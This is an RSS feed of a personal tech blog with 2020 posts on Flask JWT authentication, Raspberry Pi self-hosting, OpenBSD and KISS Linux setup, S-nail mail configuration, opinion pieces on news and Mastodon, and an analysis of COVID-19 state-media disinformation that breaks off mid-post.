icyphox's blog https://icyphox.sh/ Computers, security and computer security. icyphox logo https://icyphox.sh/icyphox.png https://icyphox.sh/ en-us Creative Commons BY-NC-SA 4.0 Flask-JWT-Extended × Flask-LoginFor the past few months, I’ve been working on building a backend for $STARTUP, with a bunch of friends. I’ll probably write in detail about it when we launch our beta. The backend is your bog standard REST API, built on Flask—if you didn’t guess from the title already.

Our existing codebase heavily relies on Flask-Login; it offers some pretty neat interfaces for dealing with users and their states. However, its default mode of operation—sessions—don’t really fit into a Flask app that’s really just an API. It’s not optimal. Besides, this is what JWTs were built for.

I won’t bother delving deep into JSON web tokens, but the general flow is like so:

  • client logs in via say /login
  • a unique token is sent in the response
  • each subsequent request authenticated request is sent with the token

The neat thing about tokens is you can store stuff in them—“claims”, as they’re called.

returning an access_token to the client

The access_token is sent to the client upon login. The idea is simple, perform your usual checks (username / password etc.) and login the user via flask_login.login_user. Generate an access token using flask_jwt_extended.create_access_token, store your user identity in it (and other claims) and return it to the user in your 200 response.

Here’s the excerpt from our codebase.

access_token = create_access_token(identity=email)
login_user(user, remember=request.json["remember"])
return good("Logged in successfully!", access_token=access_token)

But, for login_user to work, we need to setup a custom user loader to pull out the identity from the request and return the user object.

defining a custom user loader in Flask-Login

By default, Flask-Login handles user loading via the user_loader decorator, which should return a user object. However, since we want to pull a user object from the incoming request (the token contains it), we’ll have to write a custom user loader via the request_loader decorator.

# Checks the 'Authorization' header by default.
app.config["JWT_TOKEN_LOCATION"] = ["json"]

# Defaults to 'identity', but the spec prefers 'sub'.
app.config["JWT_IDENTITY_CLAIM"] = "sub"

@login.request_loader
def load_person_from_request(request):
    try:
        token = request.json["access_token"]
    except Exception:
        return None
    data = decode_token(token)
    # this can be your 'User' class
    person = PersonSignup.query.filter_by(email=data["sub"]).first()
    if person:
        return person
    return None

There’s just one mildly annoying thing to deal with, though. Flask-Login insists on setting a session cookie. We will have to disable this behaviour ourselves. And the best part? There’s no documentation for this—well there is, but it’s incomplete and points to deprecated functions.

To do this, we define a custom session interface, like so:

from flask.sessions import SecureCookieSessionInterface
from flask import g
from flask_login import user_loaded_from_request

@user_loaded_from_request.connect
def user_loaded_from_request(app, user=None):
    g.login_via_request = True


class CustomSessionInterface(SecureCookieSessionInterface):
    def should_set_cookie(self, *args, **kwargs):
        return False

    def save_session(self, *args, **kwargs):
        if g.get("login_via_request"):
            return
        return super(CustomSessionInterface, self).save_session(*args, **kwargs)


app.session_interface = CustomSessionInterface()

In essence, this checks the global store g for login_via_request and and doesn’t set a cookie in that case. I’ve submitted a PR upstream for this to be included in the docs (#514).

]]>
https://icyphox.sh/blog/flask-jwt-loginWed, 24 Jun 2020 00:00:00 +0000https://icyphox.sh/blog/flask-jwt-login
You don't need newsNews—the never ending feed of information pertaining to “current events”, politics, trivia, and other equally useless junk. News today is literally just this: “<big name person> did/said <dumb thing>!”, “<group> protests against <bad thing>!”, and so on. Okay, shit’s going on in this world. Another day, another thing to be $FEELING about.

Now here’s a question for you: do you remember what news you consumed yesterday? The day before? Last week? Heck no! Maybe some major headlines, but really, what did you gain from learning that information? Must’ve been interesting to read at that time. Hence, news, by virtue of its “newness”, is given importance—and get this, it isn’t even important enough for you to bother remembering it for a few days.

News is entertainment. Quick gratification that lasts a day, at max.

actionable news

So what is useful news, then? I think I’ll go out on a limb here, and say “anything that is actionable”. By that I mean anything that you can physically affect / information that you can actually put to use. Again, there are probably edge-cases and this isn’t a rule that fits all, but it’s a decent principle to follow.

As an example, to readers living outside of the US, news regarding police brutality & the Black Lives Matter movement are unactionable. I’m not saying those problems don’t exist or don’t matter, but what are you really doing to help the cause? Sending thoughts and prayers? Posting angrily on Instagram? Tweeting about it? Stop, and think for yourself if these things actually make any difference. Your time might be better invested in doing something else.

other problems

There are other, more concerning problems with modern news—it is no longer purely objective. The sad state of news / reporting today is it’s inherently biased. I mean political bias, of course. All news is either left-leaning or right-leaning, and narratives are developed to fit their political stance. This is essentially propaganda. Today’s news is propaganda. If anything, this should be reason enough to avoid it.

but I compare multiple sources!

Okay, so you read the same thing written by CNN, BBC, The New York Times, etc.? Do you realize how much time you wasted doing this? Ultimately to what end—to forget about it by the next day, and do it all over again. What a dull, braindead process.

won’t I be ignorant then?

If you think keeping up with current events makes you intellectually superior somehow…boy are you wrong. Do something that actually stimulates your gray matter. But, here’s the thing, if the “news” is big enough, you’re bound to come across it anyway! You might hear your friend discuss it, or see it on Twitter, so on and so forth. How you process it thereafter is what matters.

Give it a thought. Imagine if all that social media, news, and general internet noise didn’t clog your head. I think it’ll be much nicer. You might not, and that’s okay. Mail your thoughts or @ me on the fedi—I’d like to hear them.

]]>
https://icyphox.sh/blog/dont-newsSun, 21 Jun 2020 00:00:00 +0000https://icyphox.sh/blog/dont-news
Migrating to the RPiI’d ordered the Raspberry Pi 4B (the 4GB variant), sometime early this year, thinking I’d get to self-hosting everything on it as soon as it arrived. As things turn out, it ended up sitting in its box up until two weeks ago—it took me that long to order an SD card for it. No, I didn’t have one. Anyway, from there began quite the wild ride.

flashing the SD card

You’d think this would be easy right? Just plug it into your laptop’s SD card reader (or microSD), and flash it like you would a USB drive. Well, nope. Of the three laptops at home one doesn’t have an SD card reader, mine—running OpenBSD—didn’t detect it, and my brother’s—running Void—didn’t detect it either.

Then it hit me: my phone (my brother’s, actually), has an SD card slot that actually works. Perhaps I can use the phone to flash the image? Took a bit of DDG’ing (ducking?), but we eventually figured out that the block-device for the SD on the phone was /dev/mmcblk1. Writing to it was just the usual dd invocation.

got NAT’d

After the initial setup, I was eager to move my services off the Digital Ocean VPS, to the RPi. I set up the SSH port forward through my router config, as a test. Turns out my ISP has me NAT’d. The entirety of my apartment is serviced by these fellas, and they have us all under a CG-NAT. Fantastic.

Evading this means I either lease a public IP from the ISP, or I continue using my VPS, and port forward traffic from it via a tunnel. I went with option two since it gives me something to do.

NAT evasion

This was fairly simple to setup with Wireguard and iptables. I don’t really want to get into detail here, since it’s been documented aplenty online, but in essence you put your VPS and the Pi on the same network, and forward traffic hitting your internet facing interface (eth0) to the VPN’s (wg0). Fairly simple stuff.

setting up Mastodon on the Pi

Mastodon was kind of annoying to get working. My initial plan was to port forward only a few selected ports, have Mastodon exposed on the Pi at some port via nginx, and then front that nginx via the VPS. So basically: Mastodon (localhost on Pi) <-> nginx (on Pi) <-> nginx (on VPS, via Wireguard). I hope that made sense.

Anyway, this setup would require having Mastodon run on HTTP, since I’ll be HTTPS’ing at the VPS. If you think about it, it’s kinda like what Cloudflare does. But, Mastodon doesn’t like running on HTTP. It just wasn’t working. So I went all in and decided to forward all 80/443 traffic and serve everything off the Pi.

Getting back to Mastodon—the initial few hiccups aside, I was able to get it running at toot.icyphox.sh. However, as a seeker of aesthetics, I wanted my handle to be @icyphox.sh. Turns out, this can be achieved fairly easily.

Add a new WEB_DOMAIN variable to your .env.production file, found in your Mastodon root dir. Set WEB_DOMAIN to your desired domain, and LOCAL_DOMAIN to the, well, undesired one. In my case:

WEB_DOMAIN=icyphox.sh
LOCAL_DOMAIN=toot.icyphox.sh

Funnily enough, the official documentation for this says the exact opposite, which…doesn’t work.

I don’t really understand, but whatever it works and now my Mastodon is @x@icyphox.sh. I’m not complaining. Send mail if you know what’s going on here.

And oh, here’s the protective case nerd fashioned out of cardboard.

raspberry pi case

]]>
https://icyphox.sh/blog/piThu, 04 Jun 2020 00:00:00 +0000https://icyphox.sh/blog/pi
Site changesThe past couple of days, I’ve spent a fair amount of time tweaking this site. My site’s build process involves vite and a bunch of scripts. These scripts are executed via vite’s pre- and post-build actions. The big changes that were made were performance improvements in the update_index.py script, and the addition of openring.py, which you can see at the very bottom of this post!

speeding up index page generation

The old script—the one that featured in Hacky scripts—was absolutely ridiculous, and not to mention super slow. Here’s what it did:

  • got the most recent file (latest post) by sorting all posts by mtime.
  • parsed the markdown frontmatter and created a markdown table entry like:
line = f"| [{meta['title']}]({url}) | `{meta['date']}` |"
  • updated the markdown table (in _index.md) by in-place editing the markdown, with the line created earlier—for the latest post.
  • finally, I’d have to rebuild the entire site since this markdown hackery would happen at the very end of the build, i.e, didn’t actually get rendered itself.

That…probably didn’t make much sense to you, did it? Don’t bother. I don’t know what I was thinking when I wrote that mess. So with how it was done aside, here’s how it’s done now:

  • the metadata for all posts are nicely fetched and sorted using python-frontmatter.
  • the metadata list is fed into Jinja for use in templating, and is rendered very nicely using a simple for expression:
{% for p in posts %}
  <tr>
    <td align="left"><a href="/blog/{{ p.url }}">{{ p.title }}</a></td>
    <td align="right">{{ p.date }}</td>
  </tr>
{% endfor %}

A neat thing I learnt while working with Jinja, is you can use DebugUndefined in your jinja2.Environment definition to ignore uninitialized template variables. Jinja’s default behaviour is to remove all uninitialized variables from the template output. So for instance, if you had:

<body>
    {{ body }}
</body>

<footer>
    {{ footer }}
</footer>

And only {{ body }} was initialized in your template.render(body=body), the output you get would be:

<body>
    Hey there!
</body>
<footer>

</footer>

This is annoying if you’re attempting to generate your template across multiple stages, as I was. Now, I initialize my Jinja environment like so:

from jinja2 import DebugUndefined

env = jinja2.Environment(loader=template_loader,undefined=DebugUndefined)

I use the same trick for openring.py too. Speaking of…let’s talk about openring.py!

the new webring thing at the bottom

After having seen Drew’s openring, my NIH kicked in and I wrote openring.py. It pretty much does the exact same thing, except it’s a little more composable with vite. Currently, it reads a random sample of 3 feeds from a list of feeds provided in a feeds.txt file, and updates the webring with those posts. Like a feed-bingo of sorts. ;)

I really like how it turned out—especially the fact that I got my CSS grid correct in the first try!

]]>
https://icyphox.sh/blog/site-changesWed, 27 May 2020 00:00:00 +0000https://icyphox.sh/blog/site-changes
The efficacy of deepfakesA few days back, NPR put out an article discussing why deepfakes aren’t all that powerful in spreading disinformation. Link to article.

According to the article:

“We’ve already passed the stage at which they would have been most effective,” said Keir Giles, a Russia specialist with the Conflict Studies Research Centre in the United Kingdom. “They’re the dog that never barked.”

I agree. This might be the case when it comes to Russian influence. There are simpler, more cost-effective ways to conduct active measures, like memes. Besides, America already has the infrastructure in place to combat influence ops, and have been doing so for a while now.

However, there are certain demographics whose governments may not have the capability to identify and perform damage control when a disinformation campaign hits, let alone deepfakes. An example of this demographic: India.

the Indian landscape

The disinformation problem in India is way more sophisticated, and harder to combat than in the West. There are a couple of reasons for this:

  • The infrastructure for fake news already exists: WhatsApp
  • Fact checking media in 22 different languages is non-trivial

India has had a long-standing problem with misinformation. The 2019 elections, the recent CAA controversy and even more recently—the coronavirus. In some cases, it has even lead to mob violence.

All of this shows that the populace is easily influenced, and deepfakes are only going to simplify this. What’s worse is explaining to a rural crowd that something like a deepfake can exist—comprehension and adoption of technology has always been slow in India, and can be attributed to socio-economic factors.

There also exists a majority of the population that’s already been influenced to a certain degree: the right wing. A deepfake of a Muslim leader trashing Hinduism will be eaten up instantly. They are inclined to believe it is true, by virtue of prior influence and given the present circumstances.

countering deepfakes

The thing about deepfakes is the tech to spot them already exists. In fact, some can even be eyeballed. Deepfake imagery tends to have weird artifacting, which can be noticed upon closer inspection. Deepfake videos, of people specifically, blink / move weirdly. The problem at hand, however, is the general public cannot be expected to notice these at a quick glance, and the task of proving a fake is left to researchers and fact checkers.

Further, India does not have the infrastructure to combat deepfakes at scale. By the time a research group / think tank catches wind of it, the damage is likely already done. Besides, disseminating contradictory information, i.e. “this video is fake”, is also a task of its own. Public opinion has already been swayed, and the brain dislikes contradictions.

why haven’t we seen it yet?

Creating a deepfake isn’t trivial. Rather, creating a convincing one isn’t. I would also assume that most political propaganda outlets are just large social media operations. They lack the technical prowess and / or the funding to produce a deepfake. This doesn’t mean they can’t ever.

It goes without saying, but this post isn’t specific to India. I’d say other countries with a similar socio-economic status are in a similar predicament. Don’t write off deepfakes as a non-issue just because America did.

]]>
https://icyphox.sh/blog/efficacy-deepfakesMon, 11 May 2020 00:00:00 +0000https://icyphox.sh/blog/efficacy-deepfakes
Simplicity (mostly) guarantees securityAlthough it is a very comfy one, it’s not just an aesthetic. Simplicity and minimalism, in technology, is great for security too. I say “mostly” in the title because human error cannot be discounted, and nothing is perfect. However, the simpler your tech stack is, it is inherentely more secure than complex monstrosities.

Let’s look at systemd, for example. It’s got over 1.2 million lines of code. “Hurr durr but LoC doesn’t mean anything!” Sure ok, but can you imagine auditing this? How many times has it even been audited? I couldn’t find any audit reports. No, the developers are not security engineers and a trustworthy audit must be done by a third-party. What’s scarier, is this thing runs on a huge percentage of the world’s critical infrastructure and contains privileged core subsystems.

“B-but Linux is much bigger!” Indeed, it is, but it has a thousand times (if not more) the number of eyes looking at the code, and there have been multiple third-party audits. There are hundreds of independent orgs and multiple security teams looking at it. That’s not the case with systemd—it’s probably just RedHat.

Compare this to a bunch of shell scripts. Agreed, writing safe shell can be hard and there are a ton of weird edge-cases depending on your shell implementation, but the distinction here is you wrote it. Which means, you can identify what went wrong—things are predictable. systemd, however, is a large blackbox, and its state at runtime is largely unprovable and unpredictable. I am certain even the developers don’t know.

And this is why I whine about complexity so much. A complex, unpredictable system is nothing more than a large attack surface. Drew DeVault, head of sourcehut wrote something similar (yes that’s the link, yes it has a typo).:

https://sourcehut.org/blog/2020-04-20-prioritizing-simplitity/

He manually provisions all sourcehut infrastructure, because tools like Salt, Kubernetes etc. are just like systemd in our example—large monstrosities which can get you RCE’d. Don’t believe me? See this.

This was day 3 of the #100DaysToOffload challenge. It came out like a systemd-hate post, but really, I couldn’t think of a better example.

]]>
https://icyphox.sh/blog/simplicity-securityThu, 07 May 2020 00:00:00 +0000https://icyphox.sh/blog/simplicity-security
The S-nail mail clientTL;DR: Here’s my .mailrc.

As I’d mentioned in my blog post about mael, I’ve been on the lookout for a good, usable mail client. As it happens, I found S-nail just as I was about to give up on mael. Turns out writing an MUA isn’t all too easy after all. S-nail turned out to be the perfect client for me, but I had to invest quite some time in reading the very thorough manual and exchanging emails with its very friendly author. I did it so you don’t have to1, and I present to you this guide.

basic settings

These settings below should guarantee some sane defaults to get started with. Comments added for context.

# enable upward compatibility with S-nail v15.0
set v15-compat

# charsets we send mail in
set sendcharsets=utf-8,iso-8859-1

# reply back in sender's charset
set reply-in-same-charset

# prevent stripping of full names in replies
set fullnames

# adds a 'Mail-Followup-To' header; useful in mailing lists
set followup-to followup-to-honour-ask-yes

# asks for an attachment after composing
set askattach

# marks a replied message as answered
set markanswered

# honors the 'Reply-To' header
set reply-to-honour

# automatically launches the editor while composing mail interactively
set editalong

# I didn't fully understand this :) 
set history-gabby=all

# command history storage
set history-file=~/.s-nailhist

# sort mail by date (try 'thread' for threaded view)
set autosort=date

authentication

With these out of the way, we can move on to configuring our account—authenticating IMAP and SMTP. Before that, however, we’ll have to create a ~/.netrc file to store our account credentials.

(This of course, assumes that your SMTP and IMAP credentials are the same. I don’t know what to do otherwise. )

machine *.domain.tld login user@domain.tld password hunter2

Once done, encrypt this file using gpg / gpg2. This is optional, but recommended.

$ gpg2 --symmetric --cipher-algo AES256 -o .netrc.gpg .netrc

You can now delete the plaintext .netrc file. Now add these lines to your .mailrc:

set netrc-lookup
set netrc-pipe='gpg2 -qd ~/.netrc.gpg'

Before we define our account block, add these two lines for a nicer IMAP experience:

set imap-cache=~/.cache/nail
set imap-keepalive=240

Defining an account is dead simple.

account "personal" {
    localopts yes
    set from="Your Name <user@domain.tld>"
    set folder=imaps://imap.domain.tld:993

    # copy sent messages to Sent; '+' indicates subdir of 'folder' 
    set record=+Sent
    set inbox=+INBOX

    # optionally, set this to 'smtps' and change the port accordingly
    # remove 'smtp-use-starttls'
    set mta=smtp://smtp.domain.tld:587 smtp-use-starttls

    # couple of shortcuts to useful folders
    shortcut sent +Sent \
        inbox +INBOX \
        drafts +Drafts \
        trash +Trash \
        archives +Archives
}

# enable account on startup
account personal

You might also want to trash mail, instead of perma-deleting them (delete does that). To achieve this, we define an alias:

define trash {
    move "$@" +Trash
}

commandalias del call trash

Replace +Trash with the relative path to your trash folder.

aesthetics

The fun stuff. I don’t feel like explaining what these do (hint: I don’t fully understand it either), so just copy-paste it and mess around with the colors:

# use whatever symbol you fancy
set prompt='> '

colour 256 sum-dotmark ft=bold,fg=13 dot
colour 256 sum-header fg=007 older
colour 256 sum-header bg=008 dot
colour 256 sum-header fg=white
colour 256 sum-thread bg=008 dot
colour 256 sum-thread fg=cyan

The prompt can be configured more extensively, but I don’t need it. Read the man page if you do.

essential commands

Eh, you can just read the man page, I guess. But here’s a quick list off the top of my head:

  • headers: Lists all messages, with the date, subject etc.
  • mail: Compose mail.
  • <number>: Read mail by specifiying its number on the message list.
  • delete <number>: Delete mail.
  • new <number>: Mark as new (unread).
  • file <shortcut or path to folder>: Change folders. For example: file sent

That’s all there is to it.

This is day 2 of the #100DaysToOffload challenge. I didn’t think I’d participate, until today. So yesterday’s post is day 1. Will I keep at it? I dunno. We’ll see.


  1. Honestly, read the man page (and email Steffen!)—there’s a ton of useful options in there. 

]]>
https://icyphox.sh/blog/s-nailWed, 06 May 2020 00:00:00 +0000https://icyphox.sh/blog/s-nail
Stop joining mastodon.socialNo, really. Do you actually understand why the Mastodon network exists, and what it stands for, or are you just LARPing? If you’re going to just cross-post from Twitter, why are you even on Mastodon?

Okay, so Mastodon is a “federated network”. What does that mean? You have a bunch of instances, each having their own userbase, and each instance federates with other instances, forming a distributed network. Got that? Cool. Now let’s get to the problem with mastodon.social.

mastodon.social is the instance run by the lead developer. Why does everybody flock to it? I’m really not sure, but if I were to hazard a guess, I’d say it’s because people don’t really understand federation. “Oh, big instance? I should probably join that.” Herd mentality? I dunno.

And what happens when every damn user joins just one instance? It becomes more Twitter, that’s what. The federation is gone. Nearly all activity is generated from just one instance. Here are some numbers:

  • Total number of users on Mastodon: ~2.2 million.
  • Number of users on mastodon.social: 529923

Surprisingly, there’s an instance even bigger than mastodon.social—pawoo.net. I have no idea why it’s so big and it’s primarily Japanese. Its user count is over 620k. So mastodon.social and pawoo.net put together form over 1 million users, that’s more than 50% of the entire Mastodon populace. That’s nuts.1

And you’re only enabling this centralization by joining mastodon.social! Really, what even is there on mastodon.social? Have you even seen its local timeline? Probably not. Join an instance with more flavor. Are you into, say, the BSDs? Join bsd.network. Free software? fosstodon.org. Or host your own for yourself and your friends.

If you really do care about decentralization and freedom, and aren’t just memeing to look cool on Twitter, then move your account to another instance.2


  1. https://rosenzweig.io/blog/the-federation-fallacy.html 

  2. Go to /settings/migration from your instance’s web page. 

]]>
https://icyphox.sh/blog/mastodon-socialTue, 05 May 2020 00:00:00 +0000https://icyphox.sh/blog/mastodon-social
OpenBSD on the HP Envy 13My existing KISS install broke because I thought it would be a great idea to have apk-tools alongside the kiss package manager. It’s safe to say, that did not end well—especially when I installed, and then removed a package. With a semi-broken install that I didn’t feel like fixing, I figured I’d give OpenBSD a try. And I did.

installation and setup

Ran into some trouble booting off the USB initially, turned out to be a faulty stick. Those things aren’t built to last, sadly. Flashed a new stick, booted up. Setup was pleasant, very straightforward. Didn’t really have to intervene much.

After booting in, I was greeted with a very archaic looking FVWM desktop. It’s not the prettiest thing, and especially annoying to work with when you don’t have your mouse setup, i.e. no tap-to-click.

I needed wireless, and my laptop doesn’t have an Ethernet port. USB tethering just works, but the connection kept dying. I’m not sure why. Instead, I downloaded the iwm(4) firmware from here, loaded it up on a USB stick and copied it over to /etc/firmware. After that, it was as simple as running fw_update(1) and the firmware is auto-detected and loaded. In fact, if you have working Internet, fw_update will download the required firmware for you, too.

Configuring wireless is painless and I’m so glad to see that there’s no wpa_supplicant horror to deal with. It’s as simple as:

$ doas ifconfig iwm0 nwid YOUR_SSID wpakey YOUR_PSK

Also see hostname.if(5) to make this persist. After that, it’s only a matter of specifying your desired SSID, and ifconfig will automatically auth and procure an IP lease.

$ doas ifconfig iwm0 nwid YOUR_SSID

By now I was really starting to get exasperated by FVWM, and decided to switch to something nicer. I tried building 2bwm (my previous WM), but that failed. I didn’t bother trying to figure this out, so I figured I’d give cwm(1) a shot. Afterall, people sing high praises of it.

And boy, is it good. The config is a breeze, and actually pretty powerful. Here’s mine. cwm also has a built-in launcher, so dmenu isn’t necessary anymore. Refer to cwmrc(5) for all the config options.

Touchpad was pretty simple to setup too—OpenBSD has wsconsctl(8), which lets you set your tap-to-click, mouse acceleration etc. However, more advanced configuration can be achieved by getting Xorg to use the Synaptics driver. Just add a 70-synaptics.conf to /etc/X11/xorg.conf.d (make the dir if it doesn’t exist), containing:

Section "InputClass"
    Identifier "touchpad catchall"
    Driver "synaptics"
    MatchIsTouchpad "on"
    Option "TapButton1" "1"
    Option "TapButton2" "3"
    Option "TapButton3" "2"
    Option "VertEdgeScroll" "on"
    Option "VertTwoFingerScroll" "on"
    Option "HorizEdgeScroll" "on"
    Option "HorizTwoFingerScroll" "on"
    Option "VertScrollDelta" "111"
    Option "HorizScrollDelta" "111"
EndSection  

There are a lot more options that can be configured, see synaptics(4).

Suspend and hibernate just work, thanks to apm(8). Suspend on lid-close just needs one sysctl tweak:

$ sysctl machdep.lidaction=1

I believe it’s set to 1 by default on some installs, but I’m not sure.

impressions

I already really like the philosophy of OpenBSD—security and simplicity, while not losing out on sanity. The default install is plentiful, and has just about everything you’d need to get going. I especially enjoy how everything just works! I was pleasantly surprised to see my brightness and volume keys work without any configuration! It’s clear that the devs actually dogfood OpenBSD, unlike uh, cough Free- cough. Gosh I hope it’s not the flu. :^)

Oh and did you notice all the manpage links I’ve littered throughout this post? They have manpages for everything; it’s ridiculous. And they’re very thorough. Arch Wiki is good, but it’s incorrect at times, or simply outdated. OpenBSD’s manpages, although catering only to OpenBSD have never failed me.

Performance and battery life are fine. Battery is in fact, identical, if not better than on Linux. OpenBSD disables HyperThreading/SMT for security reasons, but you can manually enable it if you wish to do so:

$ sysctl hw.smt=1

Package management is probably the only place where OpenBSD falls short. pkg_add(1) isn’t particularly fast, considering it’s written in Perl. The ports selection is fine, I have yet to find something that I need not on there. I also wish they debloated packages; maybe I’ve just been spoilt by KISS. I now have D-Bus on my system thanks to Firefox. :(

I appreciate the fact that they don’t have a political document—a Code of Conduct. CoCs are awful, and have only proven to be harmful for projects; part of the reason why I’m sick of Linux and its community. Oh wait, OpenBSD does have one: https://www.openbsd.org/mail.html ;)

I’ll be exploring vmd(8) to see if I can get a Linux environment going. Perhaps that’ll be my next post, but when have I ever delivered?

I’ll close this post off with my new rice, and a sick ASCII art I made.

      \. -- --./  
      / ^ ^ ^ \
    (o)(o) ^ ^ |_/|
     {} ^ ^ > ^| \|
      \^ ^ ^ ^/
       / -- --\
                    ~icy

openbsd rice

]]>
https://icyphox.sh/blog/openbsd-hp-envyFri, 17 Apr 2020 00:00:00 +0000https://icyphox.sh/blog/openbsd-hp-envy
The Zen of KISS LinuxI installed KISS early in January on my main machine—an HP Envy 13 (2017), and I have since noticed a lot of changes in my workflow, my approach to software (and its development), and in life as a whole. I wouldn’t call KISS “life changing”, as that would be overly dramatic, but it has definitely reshaped my outlook towards technology—for better or worse.

When I talk about KISS to people—online or IRL---I get some pretty interesting reactions and comments.1 Ranging from “Oh cool.” to “You must be retarded.”, I’ve heard it all. A classic and a personal favourite of mine, “I don’t use meme distros because I actually get work done.” It is actually, quite the opposite—I’ve been so much more productive using KISS than any other operating system. I’ll explain why shortly.

The beauty of this “distro”, is it isn’t much of a distribution at all. There is no big team, no mailing lists, no infrastructure. The entire setup is so loose, and this makes it very convenient to swap things out for alternatives. The main (and potentially community) repos all reside locally on your system. In the event that Dylan decides to call it quits and switches to Windows, we can simply just bump versions ourselves, locally! The KISS Guidestones document is a good read.

In the subseqent paragraphs, I’ve laid out the different things about KISS that stand out to me, and make using the system a lot more enjoyable.

the package system

Packaging for KISS has been delightful, to say the least. It takes me about 2 mins to write and publish a new package. Here’s the radare2 package, which I maintain, for example.

The build file (executable):

#!/bin/sh -e

./configure \
    --prefix=/usr

make
make DESTDIR="$1" install

The version file:

4.3.1 1

The checksums file (generated using kiss checksum radare2):

4abcb9c9dff24eab44d64d392e115ae774ab1ad90d04f2c983d96d7d7f9476aa  4.3.1.tar.gz

And finally, the sources file:

https://github.com/radareorg/radare2/archive/4.3.1.tar.gz

This is literally the bare minimum that you need to define a package. There’s also the depends file where you specify the dependencies for your package. kiss also generates a manifests file to track all the files and directories that your package creates during installation, for their removal, if and when that occurs. Now compare this process with any other distribution’s.

the community

As far as I know, it mostly consists of the #kisslinux channel on Freenode and the r/kisslinux subreddit. It’s not that big, but it’s suprisingly active, and super helpful. There have been some interested new KISS-related projects too: kiss-games—a repository for, well, Linux games; kiss-ppc64le and kiss-aarch64—KISS Linux ports for PowerPC and ARM64 architectures; wyvertux—an attempt at a GNU-free Linux distribution, using KISS as a base; and tons more.

the philosophy

Software today is far too complex. And its complexity is only growing. Some might argue that this is inevitable, and it is in fact progress. I disagree. Blindly adding layers and layers of abstraction (Docker, modern web “apps") isn’t progress. Look at the Linux desktop ecosystem today, for example—monstrosities like GNOME and KDE are a result of this…new wave software engineering.

I see KISS as a symbol of defiance against this malformed notion. You don’t need all the bloat these DEs ship with to have a usable system. Agreed, it’s a bit more effort to get up and running, but it is entirely worth it. Think of it as a clean table—feels good to sit down and work on, doesn’t it?

Let’s take my own experience, for example. One of the initial few software I used to install on a new system was dunst—a notification daemon. Unfortunately, it depends on D-Bus, which is Poetterware; ergo, not on KISS. However, using a system without notifications has been very pleasant. Nothing to distract you while you’re in the zone.

Another instance, again involving D-Bus (or not), is Bluetooth audio. As it happens, my laptop’s 3.5mm jack is rekt, and I need to use Bluetooth for audio, if at all. Sadly, Bluetooth audio on Linux hard-depends on D-Bus. Bluetooth stacks that don’t rely on D-Bus do exist, like on Android, but porting them over to desktop is non-trivial. However, I used this to my advantage and decided not to consume media on my laptop. This has drastically boosted my productivity, since I literally cannot watch YouTube even if I wanted to. My laptop is now strictly work-only. If I do need to watch the occasional video / listen to music, I use my phone. Compartmentalizing work and play to separate devices has worked out pretty well for me.

I’m slowly noticing myself favor low-tech (or no-tech) solutions to simple problems too. Like notetaking—I’ve tried plaintext files, Vim Wiki, Markdown, but nothing beats actually using pen and paper. Tech, from what I can see, doesn’t solve problems very effectively. In some cases, it only causes more of them. I might write another post discussing my thoughts on this in further detail.

I’m not sure what I intended this post to be, but I’m pretty happy with the mindspill. To conclude this already long monologue, let me clarify one little thing y’all are probably thinking, “Okay man, are you suggesting that we regress to the Dark Ages?”. No, I’m not suggesting that we regress, but rather, progress mindfully.


  1. No, I don’t go “I use KISS btw”. I don’t bring it up unless provoked. 

]]>
https://icyphox.sh/blog/kiss-zenFri, 03 Apr 2020 00:00:00 +0000https://icyphox.sh/blog/kiss-zen
Introducing maelUpdate: The code lives here: https://github.com/icyphox/mael

I’ve been on the lookout for a good terminal-based email client since forever, and I’ve tried almost all of them. The one I use right now sucks a little less—aerc. I have some gripes with it though, like the problem with outgoing emails not getting copied to the Sent folder, and instead erroring out with a cryptic EOF—that’s literally all it says. I’ve tried mutt, but I find it a little excessive. It feels like the weechat of email—to many features that you’ll probably never use.

I need something clean and simple, less bloated (for the lack of a better term). This is what motivated me to try writing my own. The result of this (and not to mention, being holed up at home with nothing better to do), is mael.1

mael isn’t like your usual TUI clients. I envision this to turn out similar to mailx—a prompt-based UI. The reason behind this UX decision is simple: it’s easier for me to write. :)

Speaking of writing it, it’s being written in a mix of Python and bash. Why? Because Python’s email and mailbox modules are fantastic, and I don’t think I want to parse Maildirs in bash. “But why not pure Python?” Well, I’m going to be shelling out a lot (more on this in a bit), and writing interactive UIs in bash is a lot more intuitive, thanks to some of the nifty features that later versions of bash have—read, mapfile etc.

The reason I’m shelling out is because two key components to this client, that I haven’t yet talked about—mbsync and msmtp are in use, for IMAP and SMTP respectively. And mbsync uses the Maildir format, which is why I’m relying on Python’s mailbox package. Why is this in the standard library anyway?!

The architecture of the client is pretty interesting (and possibly very stupid), but here’s what happens:

  • UI and prompt stuff in bash
  • emails are read using less
  • email templates (RFC 2822) are parsed and generated in Python
  • this is sent to bash in STDOUT, like
msg="$(./mael-parser "$maildir_message_path")"

These kind of one-way (bash -> Python) calls are what drive the entire process. I’m not sure what to think of it. Perhaps I might just give up and write the entire thing in Python. Or…I might just scrap this entirely and just shut up and use aerc. I don’t know yet. The code does seem to be growing in size rapidly. It’s about ~350 LOC in two days of writing (Python + bash). New problems arise every now and then and it’s pretty hard to keep track of all of this. It’ll be cool when it’s all done though (I think).

If only things just worked.


  1. I have yet to open source it; this post will be updated with a link to it when I do. 

]]>
https://icyphox.sh/blog/maelSun, 29 Mar 2020 00:00:00 +0000https://icyphox.sh/blog/mael
COVID-19 disinformationThe virus spreads around the world, along with a bunch of disinformation and potential malware / phishing campaigns. There are many actors, pushing many narratives—some similar, some different.

Interestingly, the three big players in the information warfare space—Russia, Iran and China seem to be running similar stories on their state-backed media outlets. While they all tend to lean towards the same, fairly anti-U.S. sentiments—that is, blaming the US for weaponizing the crisis for political gain—Iran and Russia’s content come off as more…conspiratorial. In essence, they claim that the COVID-19 virus is a “bioweapon” developed by the U.S.

Russian news agency RT tweeted:

Show of hands, who isn’t going to be surprised if it ever gets revealed that #coronavirus is a bioweapon?

RT also published an article mocking the U.S. for concerns over Russian disinformation. Another article by RT, an op-ed suggests the virus’ impact on financial markets might bring about the reinvention of communism and the end of the global capitalist system. Russian state-sponsored media can also be seen amplifying Iranian conspiracy theories—including the Islamic Revolutionary Guard Corps’ (IRGC) suggestion that COVID-19 is a U.S. bioweapon.

Iranian media outlets appear to be running stories having similar themese, as well. Here’s one by PressTV, where they very boldly claim that the virus was developed by the U.S. and/or Isreal, to use as a bioweapon against Iran. Another nonsensical piece by PressTV suggests that “there are components of the virus that are related to HIV that could not have occurred naturally”. The same article pushes another theory:

